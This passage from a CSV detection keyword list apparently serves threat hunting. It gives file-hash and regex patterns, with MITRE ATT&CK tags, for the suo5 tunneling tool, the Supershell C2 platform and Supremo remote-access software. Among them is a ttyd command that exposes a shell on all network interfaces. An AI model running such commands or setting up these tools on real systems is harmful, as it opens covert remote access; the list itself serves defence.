TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*940d75fcbce367cd600b46e2cdf9bae1481e6e977064996e11782b8da58fb106*",".{0,1000}940d75fcbce367cd600b46e2cdf9bae1481e6e977064996e11782b8da58fb106.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*94a3f1629cf89a01895fbace61e1533c0e7541b39a223581ec247e409ef4c329*",".{0,1000}94a3f1629cf89a01895fbace61e1533c0e7541b39a223581ec247e409ef4c329.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*99711b2b9f9da1f166dd69dc4542365edc60adefb2e8863bb8cae2bcd01ad15c*",".{0,1000}99711b2b9f9da1f166dd69dc4542365edc60adefb2e8863bb8cae2bcd01ad15c.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*99fbf23aa2b2c348551cd4071c26e0612318fdf92f2699c6ca416368d43d9d21*",".{0,1000}99fbf23aa2b2c348551cd4071c26e0612318fdf92f2699c6ca416368d43d9d21.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*9e032a335a7b50b69fec9d0b8ec9c64ae3d9986a6d78c79a013d97920809a282*",".{0,1000}9e032a335a7b50b69fec9d0b8ec9c64ae3d9986a6d78c79a013d97920809a282.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*9e3640e44bcdcb5ce5efb6fa63a306e63077427539ebe9a0c6d829808731c73f*",".{0,1000}9e3640e44bcdcb5ce5efb6fa63a306e63077427539ebe9a0c6d829808731c73f.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*a44b8353ce6c74595c2426c02d79495ffdd4b2472286b8622a901a430ed25251*",".{0,1000}a44b8353ce6c74595c2426c02d79495ffdd4b2472286b8622a901a430ed25251.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*abe2999a43f155a1af72ea97ef48c5c44a5e01fa3f6e1f34ac4c26c97ef17454*",".{0,1000}abe2999a43f155a1af72ea97ef48c5c44a5e01fa3f6e1f34ac4c26c97ef17454.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*ac080f7b691d31d63adb6ec24db8b66953977752fec470326e5ee3143da86751*",".{0,1000}ac080f7b691d31d63adb6ec24db8b66953977752fec470326e5ee3143da86751.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*ac0d5f70d705c28c1b964693a633feb9eaffd5560f5ca564f96b0552208adf5a*",".{0,1000}ac0d5f70d705c28c1b964693a633feb9eaffd5560f5ca564f96b0552208adf5a.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*aefc8f3e8e94a08015cc319e15a650a7b8c1c42ddb6a3f8e296196a0bec54e10*",".{0,1000}aefc8f3e8e94a08015cc319e15a650a7b8c1c42ddb6a3f8e296196a0bec54e10.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*af836adb074c6174d4387d9fce5ed7e7bfaba965a21235974e409ab45c771c17*",".{0,1000}af836adb074c6174d4387d9fce5ed7e7bfaba965a21235974e409ab45c771c17.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*b2344770edbdf6582fc88f65541386d47a3d079b7ad316dda58004025ad447db*",".{0,1000}b2344770edbdf6582fc88f65541386d47a3d079b7ad316dda58004025ad447db.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*b830677a4de7462efd2cf843cd15ab382545f2243567ec1214f52bccccd168cd*",".{0,1000}b830677a4de7462efd2cf843cd15ab382545f2243567ec1214f52bccccd168cd.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*b86ee9cb9b2d4f4c8dee5805a0ff07067cb31e8e7ede06159854314f8a3ff4b6*",".{0,1000}b86ee9cb9b2d4f4c8dee5805a0ff07067cb31e8e7ede06159854314f8a3ff4b6.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*b8e1e263041bda37b87db45bd826c8dc4a81c0b60055df4f028ec4971cd55211*",".{0,1000}b8e1e263041bda37b87db45bd826c8dc4a81c0b60055df4f028ec4971cd55211.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*b957518edefbb9a18a66d6b3c298875e5a34818bb8b8924a58e53b6c863d906e*",".{0,1000}b957518edefbb9a18a66d6b3c298875e5a34818bb8b8924a58e53b6c863d906e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*b9a7d9cee05f2f4132c71ad619dca8ce9d252ee2dabfee18a5ab552cab228fca*",".{0,1000}b9a7d9cee05f2f4132c71ad619dca8ce9d252ee2dabfee18a5ab552cab228fca.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*c2df4b64565ed88fc880fe54aee44a67b07804651be9f6b698b1e12784ef40ac*",".{0,1000}c2df4b64565ed88fc880fe54aee44a67b07804651be9f6b698b1e12784ef40ac.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*c317bfeaf967b44ca53f18c17c8b03ab7bb6d34c18383419451b28b084a91499*",".{0,1000}c317bfeaf967b44ca53f18c17c8b03ab7bb6d34c18383419451b28b084a91499.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*c730f343f26791992ca406e58e182e5185ba8a8bad1e2922c3f13f3f90be8a66*",".{0,1000}c730f343f26791992ca406e58e182e5185ba8a8bad1e2922c3f13f3f90be8a66.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*c7ad0c513a383487e712f2e5d61984f547071fa31e67c76d213647018e7251ca*",".{0,1000}c7ad0c513a383487e712f2e5d61984f547071fa31e67c76d213647018e7251ca.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*c7dc584320f2e080de96e2889fa8139adfa1fe60aa2a670476a4bf6703fad2cb*",".{0,1000}c7dc584320f2e080de96e2889fa8139adfa1fe60aa2a670476a4bf6703fad2cb.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*cc29d56606b58a553757b5a24398b0d44c899eda409a6c9b55a4085e6b47aa8c*",".{0,1000}cc29d56606b58a553757b5a24398b0d44c899eda409a6c9b55a4085e6b47aa8c.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*d172534380f802e8a74ef1ca3ae9bf0900d4c111cb79a9b6f4259a0bc8e744fa*",".{0,1000}d172534380f802e8a74ef1ca3ae9bf0900d4c111cb79a9b6f4259a0bc8e744fa.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*d377c470516465e280c764e07ea16f50cc090082e0a7b888a0b76e42aa1f832c*",".{0,1000}d377c470516465e280c764e07ea16f50cc090082e0a7b888a0b76e42aa1f832c.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*d57bf88fbac385c407440291aeeffce75f46a1fa251efd5e3edac9d60f1e6984*",".{0,1000}d57bf88fbac385c407440291aeeffce75f46a1fa251efd5e3edac9d60f1e6984.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*d7ebe2b8352754e396c34d75c90e53ecd5fc15edb4492fc52eaba80a3ae991eb*",".{0,1000}d7ebe2b8352754e396c34d75c90e53ecd5fc15edb4492fc52eaba80a3ae991eb.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*db312dd2a5735817125933d4fcee8ebab756c9f402e35c687b5f967658628307*",".{0,1000}db312dd2a5735817125933d4fcee8ebab756c9f402e35c687b5f967658628307.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*db6cf2fe1a2aef656873303d04ae8125bde61b11eccd551dc57969353a2c8141*",".{0,1000}db6cf2fe1a2aef656873303d04ae8125bde61b11eccd551dc57969353a2c8141.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*e08ab2c0c649bc8d642c0587c57a19183467debabf900244f903e2adb96cf7a7*",".{0,1000}e08ab2c0c649bc8d642c0587c57a19183467debabf900244f903e2adb96cf7a7.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*e1fa98aad857ad4bd52fb9aa42ba37b69aabfc0c1300da1d815b4e29c88d4270*",".{0,1000}e1fa98aad857ad4bd52fb9aa42ba37b69aabfc0c1300da1d815b4e29c88d4270.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*e31cae3bfd37dedab001475b1571ddd186de0d4f01d4809b6e5b836e3a37c312*",".{0,1000}e31cae3bfd37dedab001475b1571ddd186de0d4f01d4809b6e5b836e3a37c312.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*e3bbd11937075f6f6bb49c9118eea1579ef207967e89ef6b36fa91ebb81f729a*",".{0,1000}e3bbd11937075f6f6bb49c9118eea1579ef207967e89ef6b36fa91ebb81f729a.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*e6403e735f7ad321c83f64f4ecf5c3043dc167a4adb3163241003215b00ace9c*",".{0,1000}e6403e735f7ad321c83f64f4ecf5c3043dc167a4adb3163241003215b00ace9c.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*e64474e508d054c891d808e0702db18d3bf4304af5ae6ec2997c8aa59f4240e4*",".{0,1000}e64474e508d054c891d808e0702db18d3bf4304af5ae6ec2997c8aa59f4240e4.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*e7ad0cf754fa39b84ce801efadf247786a2d93e3126101562414da5bee4173e0*",".{0,1000}e7ad0cf754fa39b84ce801efadf247786a2d93e3126101562414da5bee4173e0.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*e8a2563e142a7165030209e28eddd16861dae29b09c5e9e6c047c2b7f3e2688d*",".{0,1000}e8a2563e142a7165030209e28eddd16861dae29b09c5e9e6c047c2b7f3e2688d.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*eccdc25289e45340e203e27ff93a8c0e24b5fb6ba6317ccf1e0ad64296f395ce*",".{0,1000}eccdc25289e45340e203e27ff93a8c0e24b5fb6ba6317ccf1e0ad64296f395ce.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*ee5a09ea800c9dd9353a08a8b78e51cb781e211476b793cb6684cd95a18ed096*",".{0,1000}ee5a09ea800c9dd9353a08a8b78e51cb781e211476b793cb6684cd95a18ed096.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*ee89364096c5e44a71f4a5b9a939026ae0184f350707e6e42d177ab8b8d7490b*",".{0,1000}ee89364096c5e44a71f4a5b9a939026ae0184f350707e6e42d177ab8b8d7490b.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*f0a4507fc58b3c37a70bfd12bc2164fd323e9dcc06cafbc0b048f4b4891b9a49*",".{0,1000}f0a4507fc58b3c37a70bfd12bc2164fd323e9dcc06cafbc0b048f4b4891b9a49.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*f191225491a0fd4f9c1e2f0f89d7458aa06d9493e683d374a820e38b49e50e82*",".{0,1000}f191225491a0fd4f9c1e2f0f89d7458aa06d9493e683d374a820e38b49e50e82.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*f2173450c0170fe8cbb61ebc77d8fc81fba08641e78a636e3cb0b943bca45eb1*",".{0,1000}f2173450c0170fe8cbb61ebc77d8fc81fba08641e78a636e3cb0b943bca45eb1.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*f2f97e523f7f39ab24b30b0a046e59f5b5577452563fc615588dd53bd8c5097e*",".{0,1000}f2f97e523f7f39ab24b30b0a046e59f5b5577452563fc615588dd53bd8c5097e.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*fa6fe18df0631bb7bd24068d6da47b6e4154ff339c3ae6b3c49ff1894c47f3f3*",".{0,1000}fa6fe18df0631bb7bd24068d6da47b6e4154ff339c3ae6b3c49ff1894c47f3f3.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*fad409fc082d2967d1871ea683c569c17fede1264abf8c9548b389725ca93ad8*",".{0,1000}fad409fc082d2967d1871ea683c569c17fede1264abf8c9548b389725ca93ad8.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*fb2ea158fa75ca32d03110407cf7ef8f35e2191cff9f23464e783513d1561902*",".{0,1000}fb2ea158fa75ca32d03110407cf7ef8f35e2191cff9f23464e783513d1561902.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*fca8b047b25fa5005da1c58c490d936e4744a25f54e9275efd2e3d084f779951*",".{0,1000}fca8b047b25fa5005da1c58c490d936e4744a25f54e9275efd2e3d084f779951.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*fd4a2bc256f098cde43e556226d86a211c5504ca3768366d40486677c7f2ad2f*",".{0,1000}fd4a2bc256f098cde43e556226d86a211c5504ca3768366d40486677c7f2ad2f.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" 
"*fe3ff2cfe15f89b3357a4fa4648417f6b324ec1d27391b2e6c36e441e19340df*",".{0,1000}fe3ff2cfe15f89b3357a4fa4648417f6b324ec1d27391b2e6c36e441e19340df.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*fe77ec34521fe3747717123a4504214f1bea87fb4772efbdb1b827094ae0cd03*",".{0,1000}fe77ec34521fe3747717123a4504214f1bea87fb4772efbdb1b827094ae0cd03.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*zema1/suo5*",".{0,1000}zema1\/suo5.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z" "*http://localhost:7681*",".{0,1000}http\:\/\/localhost\:7681.{0,1000}","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1420","185","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*ttyd -i 0.0.0.0 -p 7681 *",".{0,1000}ttyd\s\-i\s0\.0\.0\.0\s\-p\s7681\s.{0,1000}","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1420","185","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*ttyd -i 0.0.0.0 -p 7682 *",".{0,1000}ttyd\s\-i\s0\.0\.0\.0\s\-p\s7682\s.{0,1000}","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1420","185","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "* start SupremoService*",".{0,1000}\sstart\sSupremoService.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* Supremo.exe*",".{0,1000}\sSupremo\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Supremo.exe*",".{0,1000}\/Supremo\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\\.\pipe\Supremo*",".{0,1000}\\\\\.\\pipe\\Supremo.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - 
TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A" "*\Control\SafeBoot\Network\SupremoService*",".{0,1000}\\Control\\SafeBoot\\Network\\SupremoService.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Services\SupremoService*",".{0,1000}\\CurrentControlSet\\Services\\SupremoService.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\Program Files\Supremo\*",".{0,1000}\\Program\sFiles\\Supremo\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ProgramData\SupremoRemoteDesktop*",".{0,1000}\\ProgramData\\SupremoRemoteDesktop.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 